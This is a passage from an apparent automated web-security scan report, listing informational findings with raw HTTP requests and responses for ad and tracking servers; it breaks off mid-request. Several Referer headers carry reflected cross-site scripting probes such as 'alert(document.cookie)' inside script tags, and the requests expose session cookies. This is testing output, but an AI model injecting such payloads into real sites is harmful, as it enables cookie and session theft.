Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

27.50. http://c.brightcove.com/services/messagebroker/amf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 29 Jan 2011 05:23:04 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

27.51. http://cafr.imlive.com/NaN/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /NaN/

Request

GET /NaN/ HTTP/1.1
Host: cafr.imlive.com
Proxy-Connection: keep-alive
Referer: http://cafr.imlive.com/?b38ec'-alert(document.cookie)-'84ce48297e3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257

Response

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 15:07:52 GMT
Connection: close
Content-Length: 63

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

27.52. http://common.onset.freedom.com/fi/adsense/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/adsense/

Request

GET /fi/adsense/?scode=wrgb&placement=section HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_footer/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n13), ht iad-agg-n13.panthercdn.com
Cache-Control: max-age=7200
Expires: Fri, 28 Jan 2011 17:59:54 GMT
Age: 5855
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 4922

function google_ad_request_done(google_ads) {

   if (google_ads.length == 0) return;
   var s = ''; var i;
   var reflink="https://adwords.google.com/select/OnsiteSignupLandingPage?client=ca-freedom_js&ref
...[SNIP]...

27.53. http://common.onset.freedom.com/fi/analytics/cms/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Request

GET /fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather&ghier=weather&us=anonymous HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:38:14 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n20 ( iad-agg-n28), ht-d iad-agg-n28.panthercdn.com
Cache-Control: max-age=7200
Expires: Sat, 29 Jan 2011 14:59:19 GMT
Age: 2336
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28654

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...

27.54. http://common.onset.freedom.com/oas/jx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /oas/jx/

Request

GET /oas/jx/ HTTP/1.1
Host: common.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE];

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:13 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n12), rf-ms iad-agg-n12 ( sfo-agg-n5), rf-ms sfo-agg-n5 ( origin>CONN)
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 05:35:13 GMT
Age: 0
Content-Length: 165
Content-Type: text/html
Connection: close

<html>
<head>
<title></title>
</head>
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px;">
</body>
</html>

27.55. http://d3.zedo.com/jsc/d3/ff2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0:0; FFcat=1220,167,14:1220,101,9

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Dec 2010 05:56:24 GMT
ETag: "7e199511-8cf-4989a587fd200"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 2312460743 2312452128
Cache-Control: max-age=226046
Expires: Mon, 31 Jan 2011 07:29:10 GMT
Date: Fri, 28 Jan 2011 16:41:44 GMT
Connection: close
Content-Length: 2255

<!-- Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

27.56. http://dm.de.mookie1.com/2/B3DM/2010DM/11076249577@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11076249577@x23

Request

GET /2/B3DM/2010DM/11076249577@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296271345

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.57. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Request

GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.58. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1120619784@x23

Request

GET /2/B3DM/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2457
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.59. http://dm.de.mookie1.com/2/B3DM/2010DM/11326230958@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11326230958@x23

Request

GET /2/B3DM/2010DM/11326230958@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269957

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.60. http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11370845975@x23

Request

GET /2/B3DM/2010DM/11370845975@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270995

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.61. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:26:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.62. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:36:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.63. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:22:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.64. http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11624211567@x23

Request

GET /2/B3DM/2010DM/11624211567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264969

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.65. http://dm.de.mookie1.com/2/B3DM/2010DM/11681620464@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11681620464@x23

Request

GET /2/B3DM/2010DM/11681620464@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
